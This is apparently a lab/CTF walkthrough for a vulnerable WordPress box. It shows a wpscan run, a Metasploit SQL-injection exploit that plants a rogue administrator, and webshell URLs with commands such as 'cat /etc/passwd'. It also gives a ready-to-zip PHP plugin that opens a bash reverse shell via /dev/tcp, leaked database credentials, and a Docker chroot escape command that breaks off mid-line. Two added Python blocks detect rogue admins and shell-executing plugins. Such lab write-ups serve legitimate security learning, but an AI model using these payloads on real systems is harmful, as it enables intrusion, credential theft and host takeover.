
Scanning




First add the domain name to the hosts file.

It's a WordPress site.


Scan the site with wpscan:

┌──(root㉿kali)-[/myift/Matr]
└─# wpscan --url http://mamushka.hmv -e u,ap --plugins-detection aggressive --api-token "w37ueOSrhj3dG2sKNoaWQBgoq6tRjQ11as06z288k7U"

_______________________________________________________________

WordPress Security Scanner by the WPScan Team
Version 3.8.27
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[i] It seems like you have not updated the database for some time.


[+] URL: http://mamushka.hmv/ [192.168.56.105]
[+] Started: Sat May 24 09:29:05 2025

Interesting Finding(s):

[+] Headers
| Interesting Entries:
| - Server: Apache/2.4.61 (Debian)
| - X-Powered-By: PHP/8.2.22
| Found By: Headers (Passive Detection)
| Confidence: 100%

[+] XML-RPC seems to be enabled: http://mamushka.hmv/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/

[+] WordPress readme found: http://mamushka.hmv/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://mamushka.hmv/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299

Fingerprinting the version - Time: 00:00:09 <==================================================================================================================================> (700 / 700) 100.00% Time: 00:00:09
[i] The WordPress version could not be detected.

[+] WordPress theme in use: twentytwentyfour
| Location: http://mamushka.hmv/wp-content/themes/twentytwentyfour/
| Last Updated: 2024-11-13T00:00:00.000Z
| Readme: http://mamushka.hmv/wp-content/themes/twentytwentyfour/readme.txt
| [!] The version is out of date, the latest version is 1.3
| Style URL: http://mamushka.hmv/wp-content/themes/twentytwentyfour/style.css
| Style Name: Twenty Twenty-Four
| Style URI: https://wordpress.org/themes/twentytwentyfour/
| Description: Twenty Twenty-Four is designed to be flexible, versatile and applicable to any website. Its collecti...
| Author: the WordPress team
| Author URI: https://wordpress.org
|
| Found By: Urls In Homepage (Passive Detection)
|
| Version: 1.2 (80% confidence)
| Found By: Style (Passive Detection)
| - http://mamushka.hmv/wp-content/themes/twentytwentyfour/style.css, Match: 'Version: 1.2'

[+] Enumerating All Plugins (via Aggressive Methods)
Checking Known Locations - Time: 00:06:10 <=================================================================== > (55860 / 103783) 53.82% ETA: 00:05:17
Checking Known Locations - Time: 00:08:19 <=============================================================================================================================> (103783 / 103783) 100.00% Time: 00:08:19
[+] Checking Plugin Versions (via Passive and Aggressive Methods)

[i] Plugin(s) Identified:

[+] akismet
| Location: http://mamushka.hmv/wp-content/plugins/akismet/
| Latest Version: 5.4
| Last Updated: 2025-05-07T16:30:00.000Z
|
| Found By: Known Locations (Aggressive Detection)
| - http://mamushka.hmv/wp-content/plugins/akismet/, status: 403
|
| [!] 1 vulnerability identified:
|
| [!] Title: Akismet 2.5.0-3.1.4 - Unauthenticated Stored Cross-Site Scripting (XSS)
| Fixed in: 3.1.5
| References:
| - https://wpscan.com/vulnerability/1a2f3094-5970-4251-9ed0-ec595a0cd26c
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-9357
| - http://blog.akismet.com/2015/10/13/akismet-3-1-5-wordpress/
| - https://blog.sucuri.net/2015/10/security-advisory-stored-xss-in-akismet-wordpress-plugin.html
|
| The version could not be determined.

[+] meta-generator-and-version-info-remover
| Location: http://mamushka.hmv/wp-content/plugins/meta-generator-and-version-info-remover/
| Latest Version: 16.0 (up to date)
| Last Updated: 2024-11-20T05:03:00.000Z
| Readme: http://mamushka.hmv/wp-content/plugins/meta-generator-and-version-info-remover/readme.txt
|
| Found By: Known Locations (Aggressive Detection)
| - http://mamushka.hmv/wp-content/plugins/meta-generator-and-version-info-remover/, status: 403
|
| Version: 16.0 (100% confidence)
| Found By: Readme - Stable Tag (Aggressive Detection)
| - http://mamushka.hmv/wp-content/plugins/meta-generator-and-version-info-remover/readme.txt
| Confirmed By: Readme - ChangeLog Section (Aggressive Detection)
| - http://mamushka.hmv/wp-content/plugins/meta-generator-and-version-info-remover/readme.txt

[+] ultimate-member
| Location: http://mamushka.hmv/wp-content/plugins/ultimate-member/
| Last Updated: 2025-05-14T22:48:00.000Z
| Readme: http://mamushka.hmv/wp-content/plugins/ultimate-member/readme.txt
| [!] The version is out of date, the latest version is 2.10.4
|
| Found By: Known Locations (Aggressive Detection)
| - http://mamushka.hmv/wp-content/plugins/ultimate-member/, status: 403
|
| [!] 8 vulnerabilities identified:
|
| [!] Title: Ultimate Member < 2.8.7 - Cross-Site Request Forgery to Membership Status Change
| Fixed in: 2.8.7
| References:
| - https://wpscan.com/vulnerability/2b670a80-2682-4b7f-a549-64a35345e630
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-8520
| - https://www.wordfence.com/threat-intel/vulnerabilities/id/7ffddc03-d4ae-460e-972a-98804d947d09
|
| [!] Title: Ultimate Member < 2.8.7 - Authenticated (Contributor+) Stored Cross-Site Scripting
| Fixed in: 2.8.7
| References:
| - https://wpscan.com/vulnerability/7488f9f3-03ea-4f4e-b5fb-c0dd02c5bb59
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-8519
| - https://www.wordfence.com/threat-intel/vulnerabilities/id/9e394bb2-d505-4bf1-b672-fea3504bf936
|
| [!] Title: Ultimate Member < 2.9.0 - Missing Authorization to Authenticated (Subscriber+) Arbitrary User Profile Picture Update
| Fixed in: 2.9.0
| References:
| - https://wpscan.com/vulnerability/54a53b30-4249-4559-85f8-7aeac2dc0df2
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-10528
| - https://www.wordfence.com/threat-intel/vulnerabilities/id/0a9793b6-2186-46ef-b204-d8f8f154ebf3
|
| [!] Title: Ultimate Member – User Profile, Registration, Login, Member Directory, Content Restriction & Membership Plugin < 2.9.2 - Information Exposure
| Fixed in: 2.9.2
| References:
| - https://wpscan.com/vulnerability/cb9c5ef8-51f8-4a46-ae56-23302c5980aa
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-0318
| - https://www.wordfence.com/threat-intel/vulnerabilities/id/4ee149bf-ffa3-4906-8be2-9c3c40b28287
|
| [!] Title: Ultimate Member < 2.9.2 - Unauthenticated SQL Injection
| Fixed in: 2.9.2
| References:
| - https://wpscan.com/vulnerability/31ef60db-4847-4623-a194-8722e668e6ab
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-0308
| - https://www.wordfence.com/threat-intel/vulnerabilities/id/e3e5bb98-2652-499a-b8cd-4ebfe1c1d890
|
| [!] Title: Ultimate Member < 2.10.0 - Authenticated SQL Injection
| Fixed in: 2.10.0
| References:
| - https://wpscan.com/vulnerability/90b5192a-ceee-4612-8e21-2341bae29cad
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-12276
| - https://www.wordfence.com/threat-intel/vulnerabilities/id/846f9828-2f1f-4d08-abfb-909b8d634d8a
|
| [!] Title: Ultimate Member < 2.10.1 - Unauthenticated SQLi
| Fixed in: 2.10.1
| References:
| - https://wpscan.com/vulnerability/1d39ff72-1178-4812-be55-9bf4b58bbbb6
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-1702
| - https://www.wordfence.com/threat-intel/vulnerabilities/id/34adbae5-d615-4f8d-a845-6741d897f06c
|
| [!] Title: Ultimate Member <= 2.10.3 - Admin+ Arbitrary Function Call
| Fixed in: 2.10.4
| References:
| - https://wpscan.com/vulnerability/abc6e35c-d971-4c8f-bcd0-70c7e16ec067
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-47691
| - https://www.wordfence.com/threat-intel/vulnerabilities/id/dc8b33c7-23ef-4b5c-bdb9-b4e548d18832
|
| Version: 2.8.6 (100% confidence)
| Found By: Readme - Stable Tag (Aggressive Detection)
| - http://mamushka.hmv/wp-content/plugins/ultimate-member/readme.txt
| Confirmed By: Readme - ChangeLog Section (Aggressive Detection)
| - http://mamushka.hmv/wp-content/plugins/ultimate-member/readme.txt

[+] wp-automatic
| Location: http://mamushka.hmv/wp-content/plugins/wp-automatic/
| Latest Version: 3.115.0
| Last Updated: 2025-05-20T04:08:41.000Z
|
| Found By: Known Locations (Aggressive Detection)
| - http://mamushka.hmv/wp-content/plugins/wp-automatic/, status: 200
|
| [!] 7 vulnerabilities identified:
|
| [!] Title: Automatic 2.0.3 - csv.php q Parameter SQL Injection
| Fixed in: 2.0.4
| References:
| - https://wpscan.com/vulnerability/dadc99ca-54ee-42b4-b247-79a47b884f03
| - https://www.exploit-db.com/exploits/19187/
| - https://packetstormsecurity.com/files/113763/
|
| [!] Title: WordPress Automatic < 3.53.3 - Unauthenticated Arbitrary Options Update
| Fixed in: 3.53.3
| References:
| - https://wpscan.com/vulnerability/4e5202b8-7317-4a10-b9f3-fd6999192e15
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-4374
| - https://blog.nintechnet.com/critical-vulnerability-fixed-in-wordpress-automatic-plugin/
|
| [!] Title: Automatic < 3.92.1 - Cross-Site Request Forgery to Privilege Escalation
| Fixed in: 3.92.1
| References:
| - https://wpscan.com/vulnerability/fa2f3687-7a5f-4781-8284-6fbea7fafd0e
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-27955
| - https://www.wordfence.com/threat-intel/vulnerabilities/id/12adf619-4be8-4ecf-8f67-284fc44d87d0
|
| [!] Title: Automatic < 3.92.1 - Unauthenticated Arbitrary File Download and Server-Side Request Forgery
| Fixed in: 3.92.1
| References:
| - https://wpscan.com/vulnerability/53b97401-1352-477b-a69a-680b01ef7266
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-27954
| - https://www.wordfence.com/threat-intel/vulnerabilities/id/620e8931-64f0-4d9c-9a4c-1f5a703845ff
|
| [!] Title: Automatic < 3.92.1 - Unauthenticated SQL Injection
| Fixed in: 3.92.1
| References:
| - https://wpscan.com/vulnerability/53a51e79-a216-4ca3-ac2d-57098fd2ebb5
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-27956
| - https://www.wordfence.com/threat-intel/vulnerabilities/id/a8b319be-f312-4d02-840f-e2a91c16b67a
|
| [!] Title: WordPress Automatic Plugin < 3.93.0 Cross-Site Request Forgery
| Fixed in: 3.93.0
| References:
| - https://wpscan.com/vulnerability/e5d0dcec-41a7-40ae-b9ce-f839de9c28b8
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-32693
| - https://www.wordfence.com/threat-intel/vulnerabilities/id/6231e47e-2120-4746-97c1-2aa80aa18f4e
|
| [!] Title: WordPress Automatic < 3.95.0 - Authenticated (Contributor+) Stored Cross-Site Scripting via autoplay Parameter
| Fixed in: 3.95.0
| References:
| - https://wpscan.com/vulnerability/d0198310-b323-476a-adf8-10504383ce1c
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-4849
| - https://www.wordfence.com/threat-intel/vulnerabilities/id/4be58bfa-d489-45f5-9169-db8bab718175
|
| The version could not be determined.

[+] Enumerating Users (via Passive and Aggressive Methods)
Brute Forcing Author IDs - Time: 00:00:00 <=====================================================================================================================================> (10 / 10) 100.00% Time: 00:00:00

[i] User(s) Identified:

[+] admin
| Found By: Rss Generator (Passive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)

[+] WPScan DB API OK
| Plan: free
| Requests Done (during the scan): 5
| Requests Remaining: 20

[+] Finished: Sat May 24 09:39:28 2025
[+] Requests Done: 105129
[+] Cached Requests: 19
[+] Data Sent: 28.118 MB
[+] Data Received: 43.189 MB
[+] Memory used: 456.652 MB
[+] Elapsed time: 00:10:22

From the scan results we know we can exploit the Automatic plugin's CVE-2024-27956 unauthenticated SQL injection vulnerability.

nuclei can also be used to confirm it:

nuclei -target http://mamushka.hmv


Here the msf module can be used directly.



Note that this vulnerability cannot be exploited all the way (newer WordPress versions do not allow uploading PHP files), so no shell is obtained through it, and the module's automatic check therefore cannot determine whether the target is vulnerable.

If we override the automatic check it proceeds step by step; although we do not get a shell, we do successfully get an administrator user.

msf6 exploit(multi/http/wp_automatic_sqli_to_rce) > set VERBOSE true
VERBOSE => true
msf6 exploit(multi/http/wp_automatic_sqli_to_rce) > run
[*] Started reverse TCP handler on 192.168.56.103:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[-] Exploit aborted due to failure: unknown: Cannot reliably check exploitability. "set ForceExploit true" to override check result.
[*] Exploit completed, but no session was created.
msf6 exploit(multi/http/wp_automatic_sqli_to_rce) > set ForceExploit true
ForceExploit => true
msf6 exploit(multi/http/wp_automatic_sqli_to_rce) > run
[*] Started reverse TCP handler on 192.168.56.103:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Attempting SQLi test to verify vulnerability...
[!] The target is not exploitable. Target is not vulnerable or the SQLi test failed. ForceExploit is enabled, proceeding with exploitation.
[*] {SQLi} Executing (SELECT 17 FROM information_schema.tables WHERE table_name = 'wp_users')
[*] {SQLi} Encoded to (SELECT 17 FROM information_schema.tables WHERE table_name = 0x77705f7573657273)
[*] {SQLi} Time-based injection: expecting output of length 0
[*] {WPSQLi} Default prefix not found, attempting to detect custom table prefix...
[*] {SQLi} Executing (SELECT LEFT(table_name, LENGTH(table_name) - LENGTH('users')) FROM information_schema.tables WHERE table_schema = database() AND table_name LIKE '%\_users' AND (SELECT COUNT(*) FROM information_schema.columns i WHERE i.table_schema = tables.table_schema AND i.table_name = tables.table_name AND i.column_name IN ('user_login', 'user_pass') ) = 2 LIMIT 1)
[*] {SQLi} Encoded to (SELECT LEFT(table_name, LENGTH(table_name) - LENGTH(0x7573657273)) FROM information_schema.tables WHERE table_schema = database() AND table_name LIKE 0x255c5f7573657273 AND (SELECT COUNT(*) FROM information_schema.columns i WHERE i.table_schema = tables.table_schema AND i.table_name = tables.table_name AND i.column_name IN (0x757365725f6c6f67696e, 0x757365725f70617373) ) = 2 LIMIT 1)
[*] {SQLi} Time-based injection: expecting output of length 2
[*] {WPSQLi} Custom table prefix detected: 'Ep'
[*] {SQLi} Executing (INSERT INTO Epusers (user_login, user_pass, user_nicename, user_email, user_registered, user_status, display_name) SELECT 'myift.123', MD5('myift.123'), 'myift.123', 'krysten_schuster@pfannerstill.example', user_registered, user_status, 'myift.123' FROM Epusers WHERE NOT EXISTS ( SELECT 1 FROM Epusers WHERE user_login = 'myift.123' ) LIMIT 1 ON DUPLICATE KEY UPDATE user_pass = MD5('myift.123'), user_nicename = 'myift.123', user_email = 'krysten_schuster@pfannerstill.example', display_name = 'myift.123')
[*] {SQLi} Encoded to (INSERT INTO Epusers (user_login, user_pass, user_nicename, user_email, user_registered, user_status, display_name) SELECT 0x6d796966742e313233, MD5(0x6d796966742e313233), 0x6d796966742e313233, 0x6b72797374656e5f7363687573746572407066616e6e65727374696c6c2e6578616d706c65, user_registered, user_status, 0x6d796966742e313233 FROM Epusers WHERE NOT EXISTS ( SELECT 1 FROM Epusers WHERE user_login = 0x6d796966742e313233 ) LIMIT 1 ON DUPLICATE KEY UPDATE user_pass = MD5(0x6d796966742e313233), user_nicename = 0x6d796966742e313233, user_email = 0x6b72797374656e5f7363687573746572407066616e6e65727374696c6c2e6578616d706c65, display_name = 0x6d796966742e313233)
[*] {WPSQLi} User 'myift.123' created or updated successfully.
[*] {SQLi} Executing (INSERT INTO Epusermeta (user_id, meta_key, meta_value) SELECT ID, 'Epcapabilities', 'a:1:{s:13:"administrator";s:1:"1";}' FROM Epusers WHERE user_login = 'myift.123' ON DUPLICATE KEY UPDATE meta_value = 'a:1:{s:13:"administrator";s:1:"1";}')
[*] {SQLi} Encoded to (INSERT INTO Epusermeta (user_id, meta_key, meta_value) SELECT ID, 0x45706361706162696c6974696573, 0x613a313a7b733a31333a2261646d696e6973747261746f72223b733a313a2231223b7d FROM Epusers WHERE user_login = 0x6d796966742e313233 ON DUPLICATE KEY UPDATE meta_value = 0x613a313a7b733a31333a2261646d696e6973747261746f72223b733a313a2231223b7d)
[*] {WPSQLi} Admin privileges granted or updated for user 'myift.123'.
[-] Exploit aborted due to failure: unexpected-reply: Failed to log in to WordPress admin.
[*] Exploit completed, but no session was created.
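The module's trace above shows exactly what an SQL-inserted administrator looks like in the database: a password column holding a raw MD5() value instead of a WordPress hash, a user_registered timestamp copied from an existing row, and an administrator capabilities row under the real (non-wp_) table prefix. The following audit is an added defensive example, not code from the original post or from Metasploit; it rebuilds those two tables in an in-memory SQLite database with constructed rows (the names and emails are made up) and flags accounts showing those traits.

```python
import hashlib
import re
import sqlite3

# Constructed sample data: an in-memory copy of the two WordPress tables the module
# above touched, using the non-default table prefix 'Ep' it detected.
PREFIX = "Ep"
USERS = [  # (ID, user_login, user_pass, user_email, user_registered)
    (1, "admin", "$P$BqX2ZKzYhV4q1L5nJvGfVq1WcTOs1n/", "admin@example.test", "2024-11-01 10:00:00"),
    (2, "editor", "$P$BrY7Qq0q5T0Yr3V5w4dFq1WcTOs1m0.", "editor@example.test", "2024-11-02 10:00:00"),
    # Shaped like the row the SQLi wrote: raw MD5 password, timestamp copied from row 1.
    (3, "myift.123", hashlib.md5(b"myift.123").hexdigest(), "k@pfannerstill.example", "2024-11-01 10:00:00"),
]
ADMIN_CAP = 'a:1:{s:13:"administrator";s:1:"1";}'
META = [  # (umeta_id, user_id, meta_key, meta_value)
    (1, 1, PREFIX + "capabilities", ADMIN_CAP),
    (2, 2, PREFIX + "capabilities", 'a:1:{s:6:"editor";s:1:"1";}'),
    (3, 3, PREFIX + "capabilities", ADMIN_CAP),
]

def build_sample_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute(f"CREATE TABLE {PREFIX}users (ID INTEGER PRIMARY KEY, user_login TEXT, "
                 "user_pass TEXT, user_email TEXT, user_registered TEXT)")
    conn.execute(f"CREATE TABLE {PREFIX}usermeta (umeta_id INTEGER PRIMARY KEY, "
                 "user_id INTEGER, meta_key TEXT, meta_value TEXT)")
    conn.executemany(f"INSERT INTO {PREFIX}users VALUES (?,?,?,?,?)", USERS)
    conn.executemany(f"INSERT INTO {PREFIX}usermeta VALUES (?,?,?,?)", META)
    return conn

def detect_prefix(conn: sqlite3.Connection) -> str:
    """Recover the real prefix the way the module did: the *users table carrying
    user_login and user_pass (sqlite_master/PRAGMA stand in for information_schema)."""
    for (name,) in conn.execute("SELECT name FROM sqlite_master WHERE type='table' AND name LIKE '%users'"):
        cols = {row[1] for row in conn.execute(f"PRAGMA table_info({name})")}
        if {"user_login", "user_pass"} <= cols:
            return name[: -len("users")]
    raise LookupError("no WordPress users table found")

def find_rogue_admins(conn: sqlite3.Connection) -> list:
    """Return (login, reasons) for administrator accounts that look SQL-inserted."""
    prefix = detect_prefix(conn)
    users = conn.execute(f"SELECT ID, user_login, user_pass, user_registered FROM {prefix}users ORDER BY ID").fetchall()
    admins = {uid for (uid,) in conn.execute(f"SELECT user_id FROM {prefix}usermeta WHERE meta_key = ? "
                                             "AND meta_value LIKE ?", (prefix + "capabilities", '%s:13:"administrator"%'))}
    findings = []
    for uid, login, pw_hash, registered in [u for u in users if u[0] in admins]:
        reasons = []
        # Core writes phpass ($P$...) or, on recent versions, bcrypt hashes; a bare 32-hex MD5
        # is only accepted as a legacy value at login time and is never written by core.
        if re.fullmatch(r"[0-9a-f]{32}", pw_hash):
            reasons.append("raw-md5-password-hash")
        # The INSERT ... SELECT above copies user_registered from an existing row, so a
        # newer admin sharing an older account's exact timestamp is suspect.
        if any(o_id < uid and o_ts == registered for o_id, _, _, o_ts in users):
            reasons.append("registered-timestamp-copied-from-older-account")
        if reasons:
            findings.append((login, reasons))
    return findings
```

Against a real site the same two queries run unchanged on the MySQL database (swap sqlite_master for information_schema.tables); the MD5 trait disappears once the rogue account logs in, because WordPress re-hashes legacy values at that point, so the check is most useful on a fresh dump.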


To get a shell from here we can upload a malicious plugin, for example a zipped reverse-shell file.

After uploading, simply activate it to get a shell. We can use wordpwn.py for this.

✅ Usage
① Run the script

python wordpwn.py 192.168.0.6 8888 Y

192.168.0.6 is your listener IP;

8888 is the listener port;

Y means start the Metasploit handler automatically (equivalent to running msfconsole -x use exploit/multi/handler ...).

After generation, the current directory will contain:

malicious.zip ← the plugin file, containing the reverse shell and a WebShell

② Upload the plugin
Go to the WordPress plugin upload page (after logging into the admin backend):

http://<target-IP>/wp-admin/plugin-install.php?tab=upload

Upload malicious.zip, then click "Activate Plugin".

③ Get a shell (two ways)
Reverse connection:

You need to be listening for the reverse connection beforehand (or the handler started by wordpwn.py is already listening);

once the plugin is activated, it connects back to your machine.

WebShell (backup / stable access)
The following pages can be used to run commands:

http://<target-IP>/wp-content/plugins/malicious/wetw0rk_maybe.php
http://<target-IP>/wp-content/plugins/malicious/QwertyRocks.php
http://<target-IP>/wp-content/plugins/malicious/SWebTheme.php?cmd=ls

The last URL is the WebShell with a cmd parameter; you can swap in:

?cmd=cat /etc/passwd
?cmd=whoami
?cmd=uname -a

References:

https://github.com/wetw0rk/malicious-wordpress-plugin

https://www.hackingarticles.in/wordpress-reverse-shell/

https://book.hacktricks.wiki/en/network-services-pentesting/pentesting-web/wordpress.html?highlight=wordpress

You can also build the zip file yourself:

<?php
/**
* Plugin Name: GetRev
* Version: 10.8.1
* Author: PwnedSauce
* Author URI: http://PwnedSauce.com
* License: GPL2
*/
// Runs as soon as WordPress loads the plugin; replace ip/port with the listener.
exec("/bin/bash -c 'bash -i >& /dev/tcp/ip/port 0>&1'");
?>

Then compress it into a zip file and upload it as a plugin.
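The plugin above is nothing more than a valid plugin header followed by a top-level exec() call, so it fires the moment the plugin is activated. The scanner below is an added defensive example, not code from the original post; it writes a constructed plugin tree (hypothetical file names, one benign plugin and one shaped like GetRev) to a temporary directory and reports every command-execution sink in plugin PHP files, noting whether the call sits at top level.

```python
import re
import tempfile
from pathlib import Path

# Constructed sample plugin tree: one benign plugin and one shaped like the GetRev
# reverse-shell plugin shown above (hypothetical file names and directory layout).
SAMPLE_FILES = {
    "hello-dolly/hello.php": "<?php\n/**\n * Plugin Name: Hello Dolly\n */\n"
                             "function hello_dolly() { echo 'hi'; }\n",
    "getrev/getrev.php": "<?php\n/**\n * Plugin Name: GetRev\n * Version: 10.8.1\n */\n"
                         "exec(\"/bin/bash -c 'bash -i >& /dev/tcp/ip/port 0>&1'\");\n?>",
}
# PHP command-execution sinks, plus the bash /dev/tcp redirection idiom used above.
SINKS = re.compile(r"\b(exec|shell_exec|system|passthru|popen|proc_open)\s*\(|/dev/tcp/")
HEADER = re.compile(r"^\s*\*?\s*Plugin Name:\s*(.+)$", re.M)

def write_sample(root: Path) -> None:
    for rel, body in SAMPLE_FILES.items():
        path = root / rel
        path.parent.mkdir(parents=True, exist_ok=True)
        path.write_text(body)

def scan_plugins(root: Path) -> list:
    """Report every sink call in plugin PHP files. 'top_level' is a brace-depth
    heuristic: code at depth 0 runs as soon as WordPress includes the plugin,
    which is why a plugin like GetRev fires the moment it is activated."""
    findings = []
    for php in sorted(root.rglob("*.php")):
        text = php.read_text(errors="replace")
        header = HEADER.search(text)
        for m in SINKS.finditer(text):
            before = text[: m.start()]
            findings.append({
                "file": str(php.relative_to(root)),
                "plugin": header.group(1).strip() if header else None,
                "line": before.count("\n") + 1,
                "match": m.group(0),
                "top_level": before.count("{") == before.count("}"),
            })
    return findings

def run_sample() -> list:
    """Build the sample tree in a temp dir and scan it (used by the self-test)."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        write_sample(root)
        return scan_plugins(root)

if __name__ == "__main__":
    for finding in run_sample():
        print(finding)
```

Point scan_plugins() at a real wp-content/plugins directory to run it on a site; matches inside strings or comments are possible, so treat the output as a triage list rather than a verdict.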


Finally got a shell, damn.

Uploading plugins on this box is extremely slow.

And the wordpwn.py method never got me a shell, not sure why.


We are currently inside a Docker container.

www-data@3ed5ddfe0e0c:/var/www/html/wp-admin$ env
env
HOSTNAME=3ed5ddfe0e0c
PHP_VERSION=8.2.22
APACHE_CONFDIR=/etc/apache2
PHP_INI_DIR=/usr/local/etc/php
GPG_KEYS=39B641343D8C104B2B146DC3F9C39DC0B9698544 E60913E4DF209907D8E30D96659A97C9CF2A795A 1198C0117593497A5EC5C199286AF1F9897469DC
PHP_LDFLAGS=-Wl,-O1 -pie
PWD=/var/www/html/wp-admin
APACHE_LOG_DIR=/var/log/apache2
LANG=C
PHP_SHA256=8566229bc88ad1f4aadc10700ab5fbcec81587c748999d985f11cf3b745462df
APACHE_PID_FILE=/var/run/apache2/apache2.pid
WORDPRESS_DB_HOST=db
PHPIZE_DEPS=autoconf dpkg-dev file g++ gcc libc-dev make pkg-config re2c
TERM=hash
PHP_URL=https://www.php.net/distributions/php-8.2.22.tar.xz
APACHE_RUN_GROUP=www-data
APACHE_LOCK_DIR=/var/lock/apache2
SHLVL=4
PHP_CFLAGS=-fstack-protector-strong -fpic -fpie -O2 -D_LARGEFILE_SOURCE -D_FILE_OFFSET_BITS=64
WORDPRESS_DB_PASSWORD=Fukurokuju
APACHE_RUN_DIR=/var/run/apache2
APACHE_ENVVARS=/etc/apache2/envvars
APACHE_RUN_USER=www-data
WORDPRESS_DB_USER=matrioska
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
WORDPRESS_DB_NAME=wordpressdb
PHP_ASC_URL=https://www.php.net/distributions/php-8.2.22.tar.xz.asc
PHP_CPPFLAGS=-fstack-protector-strong -fpic -fpie -O2 -D_LARGEFILE_SOURCE -D_FILE_OFFSET_BITS=64
_=/usr/bin/env


We get a set of user credentials.

Log in directly via SSH (matrioska/Fukurokuju).

But it doesn't connect.


Comparing it with the box name, it's just missing an h.


Got the user flag.

Next is privilege escalation.


Lots of network interfaces.

Scan the different subnets (busybox wget can be used to download tools).

The rest follows the video walkthrough.


172.19.0.2 has a file service.

But the box seems to be broken; that service isn't there. The next step is to exploit CVE-2024-39943, i.e. after getting a shell in the Docker container, run:

docker run -v /:/mnt --rm -it ubuntu:20.04 chroot /m>

See the video for the specific steps:

https://www.bilibili.com/video/BV1NXRHYJE14/?vd_source=7ae4ab7583485394a0dfb021c9d73c89